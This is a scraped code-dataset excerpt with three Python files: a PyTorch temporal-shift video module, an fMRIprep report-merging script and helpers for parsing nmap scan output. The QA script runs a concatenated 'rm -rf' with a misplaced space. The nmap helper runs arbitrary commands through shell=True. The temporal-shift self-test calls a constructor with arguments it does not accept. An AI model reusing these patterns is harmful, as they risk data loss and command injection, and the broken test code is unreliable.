out.view(-1,c,w,h)\n\nclass TemporalDiffChannel(nn.Module):\n def __init__(self, in_channels, out_channels, n_segment, kernel_size, stride=1, padding=0, bias=True, n_div=8):\n super(TemporalDiffChannel, self).__init__()\n self.in_channels = in_channels\n self.out_channels = out_channels\n self.n_segment = n_segment\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.n_div = n_div\n\n\n self.diff_trans = nn.Sequential(\n nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True))\n\n # identity_weight = torch.empty(self.diff_trans[0].weight.shape)\n # nn.init.dirac_(identity_weight)\n # self.diff_trans[0].weight.data.copy_(identity_weight)\n # self.diff_trans[0].weight.data.zero_()\n # self.diff_trans[0].bias.data.zero_()\n nn.init.xavier_uniform_(self.diff_trans[0].weight)\n self.diff_trans[1].weight.data.fill_(1)\n self.diff_trans[1].bias.data.zero_()\n\n self.ori_trans = nn.Sequential(\n nn.Conv2d(in_channels, in_channels, kernel_size=kernel_size, stride=1, padding=padding, bias=bias),\n nn.BatchNorm2d(in_channels),\n nn.ReLU(inplace=True))\n\n identity_weight = torch.empty(self.ori_trans[0].weight.shape)\n nn.init.dirac_(identity_weight)\n self.ori_trans[0].weight.data.copy_(identity_weight)\n # self.ori_trans[0].bias.data.zero_()\n self.ori_trans[1].weight.data.fill_(1)\n self.ori_trans[1].bias.data.zero_()\n\n self.channelGate = ChannelGate(in_channels)\n\n\n # self.shift_conv = TemporalShift(in_channels, (3,1), padding=(1,0), n_div=8, bias=False)\n\n # if 1 - 0.0 < 1e-5:\n # self.shift_conv.weight.requires_grad = False\n # else:\n # self.shift_conv.weight.requires_grad = True\n\n\n def forward(self, x):\n # out = F.conv2d(x, self.weight, None, self.stride, 0, 1, self.channels)\n # out = 
F.pad(out, pad= [0, 0, 0, 1])\n # x.size = N*C*T*(H*W)\n\n\n nt, c, h, w = x.size()\n n_batch = nt // self.n_segment\n\n x_ori = self.ori_trans(x)\n\n\n x = x.view(n_batch, self.n_segment, c, h, w)\n x_diff = x[:, :-1] - x[:, 1:]\n x_diff = F.pad(x_diff, pad=[0, 0, 0, 0, 0, 0, 0, 1], mode='constant', value=1).view(n_batch*self.n_segment, c, h, w)\n x_diff = self.diff_trans(x_diff)\n\n # reshape_x = x.view(n_batch, -1, c, h*w).permute(0, 2, 1, 3).contiguous()\n # shift_x = self.shift_conv(reshape_x)\n # shift_x = shift_x.permute(0,2,1,3).contiguous().view(nt, c, h, w)\n # x_shift = self.diff_trans(shift_x)\n\n channel_w = self.channelGate(x_diff)\n\n\n return channel_w * x_diff + (1-channel_w) * x_ori\n\n\nclass TemporalShift(nn.Module):\n def __init__(self, in_channels, kernel_size, stride=1, padding=0, bias=True, n_div=8, p_init_type='tsm'):\n super(TemporalShift, self).__init__()\n self.in_channels = in_channels\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.fold_div = n_div\n print('=> Using fold div: {}'.format(self.fold_div))\n print('model equipped with shift conv...')\n # self.shift_conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, groups=groups, padding=padding, bias=bias)\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size, kernel_size)\n conv_params = torch.zeros((in_channels, 1)+kernel_size)\n # future_params = torch.zeros((in_channels, 1)+kernel_size)\n # print('params = ', data.size())\n fold = in_channels // n_div\n\n # TSM initialization\n if p_init_type == 'r_tsm':\n for i in range(in_channels):\n import random\n j = random.randint(0, kernel_size[0]-1)\n conv_params[i, :, j] = 1\n self.weight = nn.Parameter(conv_params)\n elif p_init_type == 'tsm':\n conv_params[:fold, :, kernel_size[0]//2+1] = 1\n conv_params[fold:2*fold, :, kernel_size[0]//2-1] = 1\n conv_params[2*fold: , :, kernel_size[0]//2] = 1\n self.weight = nn.Parameter(conv_params)\n elif p_init_type == 'TSN':\n conv_params[:, :, kernel_size[0]//2] = 1\n self.weight = nn.Parameter(conv_params)\n else:\n init.kaiming_uniform_(self.weight, a=math.sqrt(4))\n\n\n\n\n def forward(self, x):\n return F.conv2d(x, self.weight, None, self.stride, self.padding, 1, self.in_channels)\n\nclass TemporalShiftBilinearLocal(nn.Module):\n def __init__(self, in_channels, kernel_size, stride=1, padding=0, bias=True, n_div=8, p_init_type='tsm'):\n super(TemporalShiftBilinearLocal, self).__init__()\n self.in_channels = in_channels\n self.kernel_size = kernel_size\n self.stride=stride\n self.padding=padding\n self.bias = bias\n self.fold_div = n_div\n print('=> Using fold div: {}'.format(self.fold_div))\n print('model equipped with shift conv...')\n # self.shift_conv = nn.Conv3d(in_channels, out_channels, kernel_size=kernel_size, stride=stride, groups=groups, padding=padding, bias=bias)\n if isinstance(kernel_size, int):\n kernel_size = (kernel_size, kernel_size)\n conv_params1 = torch.zeros((in_channels, 1)+kernel_size)\n conv_params2 = torch.zeros((in_channels, 1)+kernel_size)\n\n # future_params = torch.zeros((in_channels, 1)+kernel_size)\n # print('params = ', data.size())\n fold = in_channels // n_div\n\n # TSM initialization\n if p_init_type == 'r_tsm':\n for i in range(in_channels):\n import random\n j = random.randint(0, kernel_size[0]-1)\n conv_params1[i, :, j] = 1\n self.weight1 = nn.Parameter(conv_params1)\n elif p_init_type == 'tsm':\n conv_params1[:fold, :, kernel_size[0]//2+1] = 1\n conv_params1[fold:2*fold, :, 
kernel_size[0]//2-1] = 1\n conv_params1[2*fold: , :, kernel_size[0]//2] = 1\n self.weight1 = nn.Parameter(conv_params1)\n elif p_init_type == 'TSN':\n conv_params1[:, :, kernel_size[0]//2] = 1\n self.weight1 = nn.Parameter(conv_params1)\n else:\n init.kaiming_uniform_(self.weight1, a=math.sqrt(4))\n\n\n # TSM initialization\n if p_init_type == 'r_tsm':\n for i in range(in_channels):\n import random\n j = random.randint(0, kernel_size[0]-1)\n conv_params2[i, :, j] = 1\n self.weight2 = nn.Parameter(conv_params2)\n elif p_init_type == 'tsm':\n conv_params2[:fold, :, kernel_size[0]//2+1] = 1\n conv_params2[fold:2*fold, :, kernel_size[0]//2-1] = 1\n conv_params2[2*fold: , :, kernel_size[0]//2] = 1\n self.weight2 = nn.Parameter(conv_params2)\n elif p_init_type == 'TSN':\n conv_params2[:, :, kernel_size[0]//2] = 1\n self.weight2 = nn.Parameter(conv_params2)\n else:\n init.kaiming_uniform_(self.weight2, a=math.sqrt(4))\n\n self.bn = nn.BatchNorm2d(in_channels)\n self.relu = nn.ReLU()\n\n def forward(self, x):\n # pdb.set_trace()\n # first-order bilinear\n # n, c, t, s = x.size()\n # x_div1 = x[:,:c//4,:,:]\n # x_div2 = x[:,c//4:,:,:]\n # identity = x_div1\n # # pdb.set_trace()\n # shift = F.conv2d(x_div1, self.weight, None, self.stride, self.padding, 1, 2*self.in_channels//self.fold_div)\n # x_div1 = torch.tanh(identity*shift)\n #\n # out = torch.cat((x_div1, x_div2), 1)\n #\n # return out\n\n # second-order bilinear\n n, c, t, s = x.size()\n x_div1 = x\n # x_div1 = x[:,:c//4,:,:]\n # x_div2 = x[:,c//4:,:,:]\n # identity = x_div1\n # pdb.set_trace()\n x_div1 = torch.mul(torch.sign(x_div1),torch.sqrt(torch.abs(x_div1)+1e-12))\n shift1 = F.conv2d(x_div1, self.weight1, None, self.stride, self.padding, 1, self.in_channels)\n shift2 = F.conv2d(x_div1, self.weight2, None, self.stride, self.padding, 1, self.in_channels)\n\n x_div1 = self.bn(shift1*shift2)\n x_div1 = self.relu(x_div1)\n\n # out = torch.cat((x_div1, x_div2), 1)\n out = x_div1\n return out\n\nclass TemporalGlobal(nn.Module):\n def __init__(self, net, n_segment=3, has_att=False, include_loss=False, n_div=8, shift_kernel=3, shift_grad=0.0):\n super(TemporalGlobal, self).__init__()\n self.net = net\n assert isinstance(net, torchvision.models.resnet.Bottleneck)\n self.n_segment = n_segment\n self.has_att = has_att\n self.fold_div = n_div\n self.include_loss = include_loss\n if has_att:\n # self.diff_conv = TemporalDiffChannel(net.conv1.in_channels, net.conv1.in_channels, n_segment, (1,1), padding=(0, 0), n_div=n_div, bias=False)\n self.accum_att = AccumAtt(net.conv1.in_channels, n_segment)\n self.shift_conv = TemporalShift(net.conv1.in_channels, (shift_kernel,1), padding=(shift_kernel//2,0), n_div=n_div, bias=False)\n # self.shift_conv_bilinear = TemporalShiftBilinearLocal(net.conv1.in_channels, (shift_kernel,1), padding=(shift_kernel//2,0), n_div=n_div, bias=False)\n if shift_grad - 0.0 < 1e-5:\n self.shift_conv.weight.requires_grad = False\n else:\n self.shift_conv.weight.requires_grad = True\n\n # Index for Temporal Pairwise Consine Similarity\n n_repeat = np.linspace(n_segment-1, 1, n_segment-1).astype(int)\n self.ind1 = np.linspace(0, n_segment-2, n_segment-1).astype(int).repeat(n_repeat, axis=0)\n self.ind1 = torch.tensor(self.ind1).long()\n\n self.ind2 = np.empty(0)\n for i in range(n_segment-1):\n ind_new = np.linspace(i+1, n_segment-1, n_segment-i-1).astype(int)\n self.ind2 = np.concatenate((self.ind2, ind_new), axis=0)\n self.ind2 = torch.tensor(self.ind2).long()\n\n # Index for neighbor frames\n self.ind3 = np.linspace(0, 
n_segment-2, n_segment-1).astype(int)\n self.ind3 = torch.tensor(self.ind3).long()\n self.ind4 = self.ind3 + 1\n\n # Index for frames far away\n n_repeat = np.linspace(n_segment-2, 1, n_segment-2).astype(int)\n self.ind5 = np.linspace(0, n_segment-3, n_segment-2).astype(int).repeat(n_repeat, axis=0)\n self.ind6 = np.empty(0)\n for i in range(n_segment-2):\n ind_new = np.linspace(i+2, n_segment-1, n_segment-i-2).astype(int)\n self.ind6 = np.concatenate((self.ind6, ind_new), axis=0)\n self.ind6 = torch.tensor(self.ind6).long()\n\n # pdb.set_trace()\n\n\n def forward(self, in_vec):\n\n x = in_vec[0]\n td_loss = in_vec[1]\n\n nt, c, h, w = x.size()\n n_batch = nt // self.n_segment\n\n identity = x\n if self.has_att:\n out = self.accum_att(x)\n else:\n out = x\n reshape_x = out.view(n_batch, -1, c, h*w).permute(0, 2, 1, 3).contiguous()\n shift_x = self.shift_conv(reshape_x)\n shift_x = shift_x.permute(0,2,1,3).contiguous().view(nt, c, h, w)\n\n\n if self.include_loss:\n out_td = shift_x\n nt, nc, w, h = out_td.size()\n n_batch = nt // self.n_segment\n\n nc_split = nc//2\n\n out_t = out_td.view(n_batch, self.n_segment, nc, w, h).permute(0,2,1,3,4).view(n_batch, nc, self.n_segment, -1)\n out_t1 = out_t.index_select(2, self.ind1.cuda())\n out_t2 = out_t.index_select(2, self.ind2.cuda())\n td_loss += torch.cosine_similarity(out_t1, out_t2, dim=3).mean(2).sum(1)\n td_simi = torch.cosine_similarity(out_t1[:,:nc_split], out_t2[:,:nc_split],dim=3).mean(2).sum(1)\n td_diff = torch.cosine_similarity(out_t1[:,nc_split:], out_t2[:,nc_split:],dim=3).mean(2).sum(1)\n td_loss += td_diff - td_simi\n\n # out_t = out.view(n_batch, self.n_segment, nc, w, h).permute(0,2,1,3,4).view(n_batch, nc, self.n_segment, -1)\n # out_t1 = out_t.index_select(2, self.ind3.cuda())\n # out_t2 = out_t.index_select(2, self.ind4.cuda())\n # td_simi = ((1-torch.cosine_similarity(out_t1, out_t2, dim=3))/2).mean(2).sum(1)\n #\n # out_t3 = out_t.index_select(2, self.ind5.cuda())\n # out_t4 = out_t.index_select(2, self.ind6.cuda())\n # pdb.set_trace()\n # td_diff = torch.cosine_similarity(out_t3, out_t4, dim=3).mean(2).sum(1)\n\n\n else:\n\n td_loss += 0\n\n# identity = x\n# if self.has_att:\n# out = self.accum_att(x)\n# else:\n# out = x\n# reshape_x = out.view(n_batch, -1, c, h*w).permute(0, 2, 1, 3).contiguous()\n# shift_x = self.shift_conv(reshape_x)\n# shift_x = shift_x.permute(0,2,1,3).contiguous().view(nt, c, h, w)\n\n out = self.net.conv1(shift_x)\n out = self.net.bn1(out)\n out = self.net.relu(out)\n\n out = self.net.conv2(out)\n out = self.net.bn2(out)\n out = self.net.relu(out)\n\n out = self.net.conv3(out)\n out = self.net.bn3(out)\n\n if self.net.downsample is not None:\n identity = self.net.downsample(x)\n\n out += identity\n out = self.net.relu(out)\n\n return out, td_loss\n\n\nclass TemporalPool(nn.Module):\n def __init__(self, net, n_segment):\n super(TemporalPool, self).__init__()\n self.net = net\n self.n_segment = n_segment\n\n def forward(self, x):\n x = self.temporal_pool(x, n_segment=self.n_segment)\n return self.net(x)\n\n @staticmethod\n def temporal_pool(x, n_segment):\n nt, c, h, w = x.size()\n n_batch = nt // n_segment\n x = x.view(n_batch, n_segment, c, h, w).transpose(1, 2) # n, c, t, h, w\n x = F.max_pool3d(x, kernel_size=(3, 1, 1), stride=(2, 1, 1), padding=(1, 0, 0))\n x = x.transpose(1, 2).contiguous().view(nt // 2, c, h, w)\n return x\n\n\ndef make_temporal_shift(net, n_segment, has_att=False, n_div=8, place='blockres', shift_type='iCover', shift_kernel=3, shift_grad=0.0, temporal_pool=False):\n if 
temporal_pool:\n n_segment_list = [n_segment, n_segment // 2, n_segment // 2, n_segment // 2]\n else:\n n_segment_list = [n_segment] * 4\n assert n_segment_list[-1] > 0\n print('=> n_segment per stage: {}'.format(n_segment_list))\n\n import torchvision\n if isinstance(net, torchvision.models.ResNet):\n if place == 'block':\n def make_block_temporal(stage, this_segment):\n blocks = list(stage.children())\n # print(blocks)\n # exit()\n print('=> Processing stage with {} blocks'.format(len(blocks)))\n for i, b in enumerate(blocks):\n blocks[i] = TemporalShift(b, n_segment=this_segment, n_div=n_div, shift_type=shift_type)\n return nn.Sequential(*(blocks))\n\n net.layer1 = make_block_temporal(net.layer1, n_segment_list[0])\n net.layer2 = make_block_temporal(net.layer2, n_segment_list[1])\n net.layer3 = make_block_temporal(net.layer3, n_segment_list[2])\n net.layer4 = make_block_temporal(net.layer4, n_segment_list[3])\n\n elif 'blockres' in place:\n n_round = 1\n if len(list(net.layer3.children())) >= 23:\n print('=> Using n_round {} to insert temporal shift'.format(n_round))\n\n def make_block_temporal(stage, this_segment, has_att, stg):\n blocks = list(stage.children())\n print('=> Processing stage with {} blocks residual'.format(len(blocks)))\n for i, b in enumerate(blocks):\n # if i == len(blocks)-1:\n # blocks[i].conv1 = TemporalShift(b.conv1, n_segment=this_segment, n_div=n_div, shift_type=shift_type)\n blocks[i] = TemporalGlobal(b, n_segment=this_segment, has_att=has_att, n_div=n_div, include_loss=True if (i == len(blocks)-1 and stg != 1) else False)\n return nn.Sequential(*blocks)\n\n net.layer1 = make_block_temporal(net.layer1, n_segment_list[0], has_att, 1)\n net.layer2 = make_block_temporal(net.layer2, n_segment_list[1], has_att, 2)\n net.layer3 = make_block_temporal(net.layer3, n_segment_list[2], has_att, 3)\n net.layer4 = make_block_temporal(net.layer4, n_segment_list[3], has_att, 4)\n else:\n raise NotImplementedError(place)\n\n\ndef make_temporal_pool(net, n_segment):\n import torchvision\n if isinstance(net, torchvision.models.ResNet):\n print('=> Injecting nonlocal pooling')\n net.layer2 = TemporalPool(net.layer2, n_segment)\n else:\n raise NotImplementedError\n\n\nif __name__ == '__main__':\n # test inplace shift v.s. 
vanilla shift\n tsm1 = TemporalShift(nn.Sequential(), n_segment=8, n_div=8, inplace=False)\n tsm2 = TemporalShift(nn.Sequential(), n_segment=8, n_div=8, inplace=True)\n\n print('=> Testing CPU...')\n # test forward\n with torch.no_grad():\n for i in range(10):\n x = torch.rand(2 * 8, 3, 224, 224)\n y1 = tsm1(x)\n y2 = tsm2(x)\n assert torch.norm(y1 - y2).item() < 1e-5\n\n # test backward\n with torch.enable_grad():\n for i in range(10):\n x1 = torch.rand(2 * 8, 3, 224, 224)\n x1.requires_grad_()\n x2 = x1.clone()\n y1 = tsm1(x1)\n y2 = tsm2(x2)\n grad1 = torch.autograd.grad((y1 ** 2).mean(), [x1])[0]\n grad2 = torch.autograd.grad((y2 ** 2).mean(), [x2])[0]\n assert torch.norm(grad1 - grad2).item() < 1e-5\n\n print('=> Testing GPU...')\n tsm1.cuda()\n tsm2.cuda()\n # test forward\n with torch.no_grad():\n for i in range(10):\n x = torch.rand(2 * 8, 3, 224, 224).cuda()\n y1 = tsm1(x)\n y2 = tsm2(x)\n assert torch.norm(y1 - y2).item() < 1e-5\n\n # test backward\n with torch.enable_grad():\n for i in range(10):\n x1 = torch.rand(2 * 8, 3, 224, 224).cuda()\n x1.requires_grad_()\n x2 = x1.clone()\n y1 = tsm1(x1)\n y2 = tsm2(x2)\n grad1 = torch.autograd.grad((y1 ** 2).mean(), [x1])[0]\n grad2 = torch.autograd.grad((y2 ** 2).mean(), [x2])[0]\n assert torch.norm(grad1 - grad2).item() < 1e-5\n print('Test passed.')\n","repo_name":"ShiningSord/Truncate-Split-Contrast-A-Framework-for-Learning-from-Mislabeled-Videos","sub_path":"ops/temporal_shift_td.py","file_name":"temporal_shift_td.py","file_ext":"py","file_size_in_byte":25662,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32830452408","text":"#!/usr/bin/python\n\n## *** I am not using this code as it seems to be ineffective ***\n## The combined html file works very slow...\n\n# Create a a combined html file for the output of the fMRIprep\n\nimport os\nimport glob\n\n# Parameters:\n# -------------------\n# files and directories:\ndatadir = '/export2/DATA/HIS/HIS_server/BIDS/derivatives/fmriprep/'\noutdir = \"/export2/DATA/HIS/HIS_server/analysis/QA/fMRIprep/\"\noutfile = outdir + \"fMRIprep_QA.html\"\n\n# run the procedure\n# --------------------\n# delete older files\nprint('\\n** QA fMRIprep (combining report htmls to fMRIprep_QA.html)')\nos.system(\"rm %s\"%(outfile))\nos.system(\"rm -rf \" + outdir + ' sub-*/')\nos.system(\"mkdir \" + outdir)\n\nall_subjects = sorted(glob.glob(datadir + 'sub-*/'))\n\nisErrorLogs = False\nisWarningLogs = False\nf = open(outfile, \"w\")\nfor file in list(all_subjects):\n subject = file.split('/')[-2]\n main_html = datadir + subject + \".html\"\n figures_source_dir = datadir + subject + '/figures'\n figures_out_dir = outdir + subject + '/figures'\n # write the combined html\n f.write(\"
=================\" + subject + \"===========================\\n\")\n with open(main_html, 'r') as content_file:\n content = content_file.read()\n f.write(content)\n # copy the relevant figures\n os.system(\"mkdir -p \" + figures_out_dir)\n os.system(\"cp -r \" + figures_source_dir + \"/* \" + figures_out_dir)\n\n # check the log file for errors:\n\n if os.popen(\"grep -i 'No errors to report' \" + main_html).read():\n pass\n elif os.popen(\"grep -i 'error' \" + main_html).read():\n print('-- ERROR in the log of the fmriprep: ' + file)\n print(os.popen(\"grep -i 'error' \" + main_html).read())\n isErrorLogs = True\n if os.popen(\"grep -i 'warning' \" + main_html).read():\n print('-- WARNING in the log of the fmriprep: ' + file)\n print(os.popen(\"grep -i 'warning' \" + main_html).read())\n isWarningLogs = True\nf.close()\n\nprint('** QA fMRIprep (creating fMRIprep_QA.html) COMPLETED.')\nif isErrorLogs:\n print('\\n *** THERE ARE LOG FILES WITH ERRORS TO EXAMINE *** ')\nif isWarningLogs:\n print('\\n *** THERE ARE LOG FILES WITH WARNINGS TO EXAMINE *** ')\n","repo_name":"ranigera/MultiModalMRI_Habits","sub_path":"3_task_fMRI_analysis_codes/QA_fMRIprep.py","file_name":"QA_fMRIprep.py","file_ext":"py","file_size_in_byte":2121,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"32456079638","text":"import os, re, sys, subprocess, ipaddress, time\nfrom subprocess import Popen,PIPE\nimport xml.etree.ElementTree as ET\nimport tabulate\n\nfrom IPy import IP\n\nfrom modules import constants\nfrom modules import settings\nfrom modules import common\nfrom modules import nmap\n\n# Source: https://github.com/django/django/blob/master/django/core/management/color.py\ndef supportsColour():\n \"\"\"\n Return True if the running system's terminal supports color,\n and False otherwise.\n \"\"\"\n plat = sys.platform\n supported_platform = plat != 'Pocket PC' and (plat != 'win32' or 'ANSICON' in os.environ)\n\n # isatty is not always implemented, #6223.\n is_a_tty = hasattr(sys.stdout, 'isatty') and sys.stdout.isatty()\n return supported_platform and is_a_tty\n \n\n# Colour output green (successprint)\ndef sprint(*args, **kwargs):\n colouredPrint(\"\\033[1;32m\", args, kwargs)\n\n# Print to stderr\ndef eprint(*args, **kwargs):\n colouredPrint(\"\\033[1;31m\", args, kwargs)\n\n# Print text with specified colour code\ndef colouredPrint(colour, args, kwargs):\n if(not settings.colourSupported):\n print(args, kwargs)\n return\n\n colouredArgs = []\n for arg in args:\n if arg == None or not isinstance(arg, str):\n colouredArgs.append('')\n continue\n colouredArgs.append(colour + arg + \"\\033[1;m\")\n print(*colouredArgs, file=sys.stderr, **kwargs)\n\n# Print only if raw option hasnt been set\ndef hprint(*args, **kwargs):\n settings.printHumanFriendlyText\n if(settings.printHumanFriendlyText):\n print(*args, **kwargs)\n\ndef getHeader(text):\n header = os.linesep + text + os.linesep\n header += '-' * len(text) + os.linesep\n return header\n\ndef header(text):\n hprint(getHeader(text))\n\ndef printUniquePorts(hosts, option=constants.PORT_OPT_DEFAULT, filters=None):\n textOutput = getUniquePortsOutput(hosts, option, filters=filters)\n textOutput.printToConsole()\n\ndef getUniquePortsOutput(hosts, option=constants.PORT_OPT_DEFAULT, filters=None):\n if filters == None:\n filters = nmap.NmapFilters()\n tcpPorts = set()\n udpPorts = set()\n allPorts = set()\n for ip in hosts:\n host = hosts[ip]\n tcpPorts = tcpPorts.union(host.getUniquePortIds('tcp', 
port_filter=filters.ports, service_filter=filters.services))\n udpPorts = udpPorts.union(host.getUniquePortIds('udp', port_filter=filters.ports, service_filter=filters.services))\n allPorts = tcpPorts.union(udpPorts)\n\n output = common.TextOutput()\n output.addHumn(getNmapFiltersString(filters))\n output.addHumn(getHeader('Unique open port list (%s)' % (option)))\n if option == constants.PORT_OPT_DEFAULT:\n output.addHumn(getHeader(\"TCP:\"))\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(tcpPorts))))\n output.addHumn(getHeader(\"UDP:\"))\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(udpPorts))))\n output.addHumn(getHeader(\"Combined:\"))\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(allPorts))))\n elif option == constants.PORT_OPT_TCP:\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(tcpPorts))))\n elif option == constants.PORT_OPT_UDP:\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(udpPorts))))\n elif option == constants.PORT_OPT_COMBINED:\n output.addMain(re.sub(r'[\\[\\] ]','',str(sorted(allPorts))))\n return output\n\ndef getNmapFiltersString(filters):\n filterString = \"\"\n if filters.areFiltersSet():\n filterString += getHeader(\"Output filtered by:\")\n if filters.hostFilterSet():\n filterString += (\"Host filter [host_filter]: %s\" % ([filter.filter for filter in filters.hosts])) + os.linesep\n if filters.serviceFilterSet():\n filterString += (\"Service filter [service_filter]: %s\" % (filters.services)) + os.linesep\n if filters.portFilterSet():\n filterString += (\"Port filter [port_filter]: %s\" % (filters.ports)) + os.linesep\n if filters.mustHavePorts:\n filterString += (\"Must have ports filter [have_ports]: %s\" % str(filters.mustHavePorts)) + os.linesep\n if filters.onlyAlive:\n filterString += (\"Alive filter [only_alive]: %s\" % str(filters.onlyAlive)) + os.linesep\n return filterString\n\ndef printNmapFilters(filters):\n filterString = getNmapFiltersString(filters)\n if(len(filterString) > 0):\n hprint(filterString)\n \n\ndef getHostListOutput(nmapOutput, includePorts = True, filters = None):\n '''Returns string representations of filtered hosts output'''\n if filters == None:\n filters = nmap.NmapFilters()\n\n output = common.TextOutput()\n output.addHumn(getNmapFiltersString(filters))\n output.addHumn(getHeader('Matched IP list'))\n\n # Get all hosts that are up and matched filters\n hostsOutput = []\n for host in nmapOutput.getHosts(filters=filters):\n curHostOutput = [host.ip, '']\n for protocol in constants.PROTOCOLS: \n fullPortsString = ''\n for port in [port for port in host.ports if port.protocol == protocol]:\n tmpPortString = str(port.portId) \n if(settings.colourSupported and port.matched):\n tmpPortString = \"\\033[1;32m\" + tmpPortString + \"\\033[1;m\"\n if len(fullPortsString) > 0:\n fullPortsString += \",\"\n fullPortsString += tmpPortString\n curHostOutput[1] += \"%s:[%s] \" % (protocol,fullPortsString)\n hostsOutput.append(curHostOutput)\n \n for hostOutput in hostsOutput:\n if includePorts:\n output.addMain(\"%s\\t%s\" % (hostOutput[0], hostOutput[1]))\n else:\n output.addMain(hostOutput[0])\n return output\n\ndef printHosts(nmapOutput, includePorts = True, filters=None):\n textOutput = getHostListOutput(nmapOutput, includePorts=includePorts, filters=filters)\n textOutput.printToConsole()\n\n# Order array of IPs\ndef sortIpList(ip_list):\n ipl = [(IP(ip).int(), ip) for ip in ip_list]\n ipl.sort()\n return [ip[1] for ip in ipl]\n\ndef printImportSummary(nmapOutput, detailed=True):\n if(detailed):\n for file in 
nmapOutput.FilesImported:\n sprint(\"Successfully loaded \" + file)\n sprint(os.linesep + \"Successfully loaded \" + str(len(nmapOutput.FilesImported)) + \" files\")\n if len(nmapOutput.FilesFailedToImport) > 0:\n eprint(\"The following files failed to parse:\")\n for file in nmapOutput.FilesFailedToImport:\n eprint(\"\\t\" + file)\n\ndef getServiceListOutput(nmapOutput, filters=None, verbose=False, includePorts=True):\n services = nmapOutput.getServices(filters)\n output = common.TextOutput()\n output.addHumn(getHeader('Service List'))\n first = True\n for service in services:\n if(verbose):\n if first:\n first = False\n else:\n output.addMain(\"\")\n svcString = service.name\n if(includePorts):\n svcString += \" \" + str(sorted(service.ports))\n output.addMain(svcString)\n if verbose:\n for host in service.hosts:\n hostString = ' ' + host.ip \n if(includePorts):\n hostString += \" \" + str(sorted(host.ports))\n output.addMain(hostString)\n return output\n\ndef printServiceList(nmapOutput, filters=None, verbose=False):\n textOutput = getServiceListOutput(nmapOutput, filters=filters, verbose=verbose)\n textOutput.printToConsole()\n\n# Execute commands\ndef executeCommands(cmd, nmapOutput, filters=None):\n if(filters == None):\n filters = nmap.NmapFilters()\n header('Running Commands')\n for host in nmapOutput.getHosts(filters):\n if len(host.ports) > 0:\n executeCommand(cmd, host.ip)\n\n# Execute Single Command\ndef executeCommand(cmd, ip):\n curCommand = cmd + \" \" + ip\n hprint(\"Running command: '%s'\" % curCommand)\n process = Popen(curCommand, shell=True, stdout=PIPE)\n output = process.stdout.read()\n hprint(\"Finished running command: %s\" % curCommand)\n header(\"OUTPUT for '%s':\" % curCommand)\n if output == '':\n print('')\n else:\n print(output)\n print('')\n\ndef printAliveIps(nmapOutput):\n header('Alive IP list')\n # Get all hosts that are up and matched filters\n tmpParsedHosts = nmapOutput.getAliveHosts()\n for ip in sortIpList(tmpParsedHosts):\n print(\"%s\" % (ip))\n\ndef getFilesInDir(directory, filter='', recurse=False):\n allFiles = []\n regex = re.compile(filter)\n if(recurse):\n for root, dirs, files in os.walk(directory):\n allFiles.extend([os.path.join(root, file) for file in files if regex.match(os.path.join(root, file))])\n else:\n allFiles.extend([os.path.join(directory, file) for file in os.listdir(directory) if regex.match(os.path.join(directory, file))])\n return allFiles\n\ndef stringToHostFilter(filterString):\n hostFilter = []\n rawHostFilterString = filterString\n # Remove any excess white space (start/end/between commas)\n curHostFilterString = rawHostFilterString.strip() #re.sub(r'[^\\d\\./,]', '', rawHostFilterString)\n # Split filter on comma, ignore empty entries and assign to filter\n tmpHostFilter = [ip.strip() for ip in curHostFilterString.split(',') if len(ip) > 0]\n for curHostFilter in tmpHostFilter:\n isFilename = False\n curFilters = []\n # Check is specified filter is a file and attempt to load each line if it is\n if(os.path.isfile(curHostFilter)):\n try:\n isFilename = True\n fhFile = open(curHostFilter, 'r')\n for line in fhFile:\n if(len(line.strip()) > 0):\n curFilters.append(line.strip())\n fhFile.close()\n except:\n eprint(\"Failed to load contents of: \" + curHostFilter)\n else:\n curFilters.append(curHostFilter)\n \n for filter in curFilters:\n validFilter = False\n isIp = False\n try:\n ipaddress.ip_address(filter)\n validFilter = True\n isIp = True\n except ValueError:\n pass\n\n try:\n ipaddress.ip_network(filter)\n validFilter 
= True\n except ValueError:\n pass\n if(validFilter):\n hostFilter.append(nmap.NmapHostFilter(filter, isIp))\n else:\n if(isFilename):\n eprint(\"Invalid host filter (within %s) option ignored: %s\" % (curHostFilter, filter))\n else:\n eprint(\"Invalid host filter option ignored: \" + filter)\n return hostFilter\n\ndef getJsonValue(jsonData, id):\n if id in jsonData:\n return jsonData[id]\n else:\n return ''\n\ndef getEpoch():\n return int(time.time())\n\ndef getHostDetails(host):\n output = common.TextOutput()\n # Get overview\n output.addHumn(getHeader(\"Overview\"))\n output.addMain(\"IP: %s\" % host.ip)\n if(host.ip != host.hostname):\n output.addMain(\"Hostname: %s\" % host.hostname)\n output.addMain(\"State: %s\" % host.getState())\n openTcp = len(host.getUniquePortIds(constants.PORT_OPT_TCP))\n openUdp = len(host.getUniquePortIds(constants.PORT_OPT_UDP))\n output.addMain(\"TCP ports open: %s\" % openTcp)\n output.addMain(\"UDP ports open: %s\" % openUdp)\n output.addMain(\"Total ports open: %s\" % (openTcp + openUdp))\n\n # Output port details\n output.addHumn(getHeader(\"Ports / Services\"))\n portTableHeaders = ['Port', 'Protocol', 'Service']\n output.addMain(tabulate.tabulate([[port.portId, port.protocol, port.service] for port in host.ports], headers = portTableHeaders, tablefmt=\"github\"))\n\n # Output files found in\n output.addHumn(getHeader(\"Files Containing Host\"))\n if(len(host.filesWithHost) == 0):\n output.addErrr(\"Host not present within any files\")\n else:\n for file in host.filesWithHost:\n output.addMain(file)\n \n return output\n\ndef wrapText(text, maxChars = 50):\n wrappedText = ''\n splitText = text.split()\n curLine = ''\n tmpLine = ''\n for word in splitText:\n tmpLine = \"%s %s\" % (curLine, word)\n if(len(tmpLine) > 